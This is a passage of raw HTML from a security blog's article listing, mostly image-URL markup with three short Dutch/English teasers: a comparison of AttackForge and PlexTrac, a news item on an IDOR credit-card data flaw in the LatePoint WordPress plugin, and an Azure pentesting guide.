/_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=120&amp;q=92 120w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=128&amp;q=92 128w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=220&amp;q=92 220w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=256&amp;q=92 256w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=360&amp;q=92 360w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=384&amp;q=92 384w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=425&amp;q=92 425w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=480&amp;q=92 480w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=640&amp;q=92 640w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=750&amp;q=92 750w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=828&amp;q=92 828w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=1080&amp;q=92 1080w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=1111&amp;q=92 1111w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=1200&amp;q=92 1200w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=1400&amp;q=92 1400w" src="/_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=1400&amp;q=92"></div><h3 class="text-lg xl:text-2xl font-semibold mb-3 prose">AttackForge vs PlexTrac Vergelijking: Verschillen, Overeenkomsten en Alternatieven</h3><p class="prose prose-sm mb-3 line-clamp-4"><span lang="nl" class="inline bg-slate-200 border-slate-600 border text-whites text-xs rounded-md px-1 mr-1.5">Nederlands, English</span>Leer de verschillen en overeenkomsten tussen AttackForge en PlexTrac voor pentestbeheer en rapportage, inclusief alternatieven, om een weloverwogen keuze te maken.</p><div lang="nl" class="flex items-center prose prose-sm max-sm:text-xs gap-5"><div class="text-dark-lave flex items-center gap-1.5 group group-hover:bg-dark-lave/10 p-1 px-3 rounded-full duration-150 hover:!bg-dark-lave/20 bg-dark-lave/10"><span>Lees Artikel</span> <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="16" width="16" xmlns="http://www.w3.org/2000/svg"><path d="M18.25 15.5a.75.75 0 0 1-.75-.75V7.56L7.28 17.78a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L16.44 6.5H9.25a.75.75 0 0 1 0-1.5h9a.75.75 0 0 1 .75.75v9a.75.75 0 0 1-.75.75Z"></path></svg></div></div></a><a class="flex items-center gap-3 group max-sm:col-span-2" href="https://websec.nl/blog/duizenden-creditcards-voor-het-oprapen-door-kritiek-lek-in-latepoint-wordpress-plugin-666b83986e63d6dcdb0f73c0"><div class="aspect-[16/12] max-w-[6rem] xs:hidden  grow rounded-md overflow-hidden shrink-0"><img alt="" loading="lazy" decoding="async" data-nimg="fill" class="object-cover !relative" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="220px" srcset="/_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=16&amp;q=75 16w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=32&amp;q=75 32w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=48&amp;q=75 48w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=60&amp;q=75 60w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=64&amp;q=75 64w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=96&amp;q=75 96w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=120&amp;q=75 120w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=128&amp;q=75 128w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=220&amp;q=75 220w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=256&amp;q=75 256w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=360&amp;q=75 360w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=384&amp;q=75 384w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=425&amp;q=75 425w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=480&amp;q=75 480w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=640&amp;q=75 640w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=750&amp;q=75 750w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=828&amp;q=75 828w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=1080&amp;q=75 1080w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=1111&amp;q=75 1111w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=1200&amp;q=75 1200w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=1400&amp;q=75 1400w" src="/_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%252FDALL%25C2%25B7E%25202024-06-14%252000.52.28%2520-%2520A%2520hacker%2520wearing%2520a%2520hoodie%252C%2520sitting%2520in%2520front%2520of%2520multiple%2520computer%2520screens%2520in%2520a%2520dimly%2520lit%2520room.%2520The%2520hacker's%2520face%2520is%2520obscured%2520by%2520shadows.%2520In%2520the%2520center%2520.webp%3Falt%3Dmedia%26token%3Dbdb2aa71-edd6-4ff7-806e-1640ff1a5880&amp;w=1400&amp;q=75"></div><article lang="nl" class="fxcol gap-2"><h3 class="font-semibold xs:text-lg prose line-clamp-2 leading-normal break-words"><span lang="nl" class="inline bg-slate-200 border-slate-600 border text-whites text-xs rounded-md px-1 mr-1.5 xs:hidden font-normal">Nederlands, English</span>Duizenden Creditcards voor het Oprapen door Kritiek Lek in LatePoint WordPress Plugin</h3><p class="prose prose-sm line-clamp-2 max-w-[90%] max-xs:hidden"><span lang="nl" class="inline bg-slate-200 border-slate-600 border text-whites text-xs rounded-md px-1 mr-1.5">Nederlands, English</span>De LatePoint-plugin voor WordPress was kwetsbaar voor ongeautoriseerde toegang tot gegevens door een IDOR, waardoor klantbetalingsgegevens zoals creditcards konden worden bekeken.</p><div lang="nl" class="flex items-center prose prose-sm max-sm:text-xs gap-1 xs:gap-5"><div class="text-dark-lave flex items-center gap-1.5 group group-hover:bg-dark-lave/10 p-1 px-3 rounded-full duration-150 hover:!bg-dark-lave/20 bg-dark-lave/10"><span>Lees Artikel</span> <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="16" width="16" xmlns="http://www.w3.org/2000/svg"><path d="M18.25 15.5a.75.75 0 0 1-.75-.75V7.56L7.28 17.78a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L16.44 6.5H9.25a.75.75 0 0 1 0-1.5h9a.75.75 0 0 1 .75.75v9a.75.75 0 0 1-.75.75Z"></path></svg></div></div></article></a><a class="flex items-center gap-3 group max-sm:col-span-2" href="https://websec.nl/blog/an-introductory-guide-to-pentesting-azure-benefits-and-tools-part-2-661c326880f704dc4b2bbeca"><div class="aspect-[16/12] max-w-[6rem] xs:hidden  grow rounded-md overflow-hidden shrink-0"><img alt="" loading="lazy" decoding="async" data-nimg="fill" class="object-cover !relative" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="220px" srcset="/_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=16&amp;q=75 16w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=32&amp;q=75 32w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=48&amp;q=75 48w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=60&amp;q=75 60w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=64&amp;q=75 64w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=96&amp;q=75 96w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=120&amp;q=75 120w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=128&amp;q=75 128w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=220&amp;q=75 220w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=256&amp;q=75 256w, 